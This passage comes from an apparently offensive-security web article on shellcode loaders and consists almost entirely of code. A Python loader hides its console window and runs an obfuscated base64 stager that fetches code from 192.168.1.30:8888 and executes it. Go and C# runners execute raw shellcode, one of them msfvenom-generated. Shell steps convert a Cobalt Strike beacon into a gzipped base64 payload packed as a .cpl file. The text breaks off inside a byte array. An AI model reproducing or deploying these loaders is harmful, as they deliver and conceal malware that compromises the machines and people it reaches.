            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadAttributes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwStackSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;param&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwCreationFlags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadId&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;handle&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hHandle&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwMilliseconds&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;GetModuleHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;moduleName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;GetProcAddress&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hModule&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;procName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;LoadLibrary&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;lpFileName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Python Loader:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;

&lt;span class="n"&gt;whnd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;GetConsoleWindow&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;whnd&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;ShowWindow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;whnd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;whnd&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;UTF-8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)}[&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;version_info&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]](&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Go with Inline C:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;package&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;

&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="s"&gt;"C"&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="s"&gt;"unsafe"&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s"&gt;"xddxc6xd9x74x24xf4x5fx33xc9xb8xb3x5ex2c"&lt;/span&gt;
    &lt;span class="o"&gt;...&lt;/span&gt; &lt;span class="c"&gt;// Additional shellcode bytes omitted&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s"&gt;"xc9xb1x97x31x47x1ax03x47x1ax83xc7x04xe2"&lt;/span&gt;
    &lt;span class="c"&gt;// at your call site, you can send the shellcode directly to the C&lt;/span&gt;
    &lt;span class="c"&gt;// function by converting it to a pointer of the correct type.&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;call&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;char&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;unsafe&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])))&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Resource Loading: CPLResourceRunner
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.txt |sed &lt;span class="s1"&gt;'s/[, ]//g; s/0x//g;'&lt;/span&gt; |tr &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'\n'&lt;/span&gt; |xxd &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; |gzip &lt;span class="nt"&gt;-c&lt;/span&gt; |base64 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b64shellcode.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generate shellcode using Cobalt Strike:&lt;br&gt;
Attacks -&amp;gt; Packages -&amp;gt; Windows Executable (s) -&amp;gt; Output =&amp;gt; RAW (x86)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;py &lt;span class="nt"&gt;-2&lt;/span&gt; ConvertShellcode.py beacon.bin
Shellcode written to shellcode.txt

0x4d,0x5a,0x41,0x52,0x55,0x48,0x89,0xe5,0x48,0x81,0xec,0x20,0x00,0x00,0x00,0x48,0x8d,0x1d,0xea,0xff,0xff,0xff,0x48,0x89,0xdf,0x48,0x81,0xc3,0x7c,0x79,0x01,0x00,0xff,0xd3,0x41,0xb8,0xf0,0xb5,0xa2,0x56,0x68,0x04,0x00,0x00,0x00,0x5a,0x48,0x89,0xf9,0xff,0xd0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0xc9,0xdb,0x6e,0xe9,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0xeb,0x54,0xd2,0xba,0x15,0xba,0x00,0xba,0x13

&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.txt |sed &lt;span class="s1"&gt;'s/[, ]//g; s/0x//g;'&lt;/span&gt; |tr &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'n'&lt;/span&gt; |xxd &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; |gzip &lt;span class="nt"&gt;-c&lt;/span&gt; |base64 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b64shellcode.txt

H4sIAPGjM14AA/ONcgwK9eh86tH4RoGBgcGjV/bV////PTrvezQerqlkZPh/2XHHh62LwjJYgLJR
Hp0//19ggIEfQMwnv4uPYQvnWcUdjD5nFUMyMosVCory04sScxWSE/Py8ksUklIVikrzFDLzFFz8
&lt;span class="nv"&gt;gxVy81NS9Xi5VKBGnLyd97J3F8MuGH4dcmmXKJAWBgD9vO6hmAAAAA&lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;

Compile to x86 and copy CPLResourceRunner.dll to RunMe.cpl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  PowerShell Loading (MMFml):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;mmfExeTwo&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.IO.MemoryMappedFiles&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

   &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
   &lt;span class="p"&gt;{&lt;/span&gt;

       &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;delegate&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

       &lt;span class="c1"&gt;// To handle the location by applying the appropriate type&lt;/span&gt;
       &lt;span class="c1"&gt;// We had to create a delegate to handle the the pointer to the location where we shim in the shellcode&lt;/span&gt;
       &lt;span class="c1"&gt;// into the Memory Mapped File.  This allows the location of the opp code to be referenced later for execution&lt;/span&gt;
       &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;unsafe&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;GetShellMemAddr&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
       &lt;span class="p"&gt;{&lt;/span&gt;
           &lt;span class="c1"&gt;// 64bit shell code.  Tested on a win10 system.  Injects "cmd -k calc"&lt;/span&gt;
           &lt;span class="c1"&gt;// was generated vanilla using "msfvenom -p windows/exec CMD="cmd /k calc" EXITFUNC=thread C -f powershell"&lt;/span&gt;
           &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;
               &lt;span class="p"&gt;{&lt;/span&gt;
                   &lt;span class="m"&gt;0xfc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xf0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x56&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x60&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x18&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x72&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0xac&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x02&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x42&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x80&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x85&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x74&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x18&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
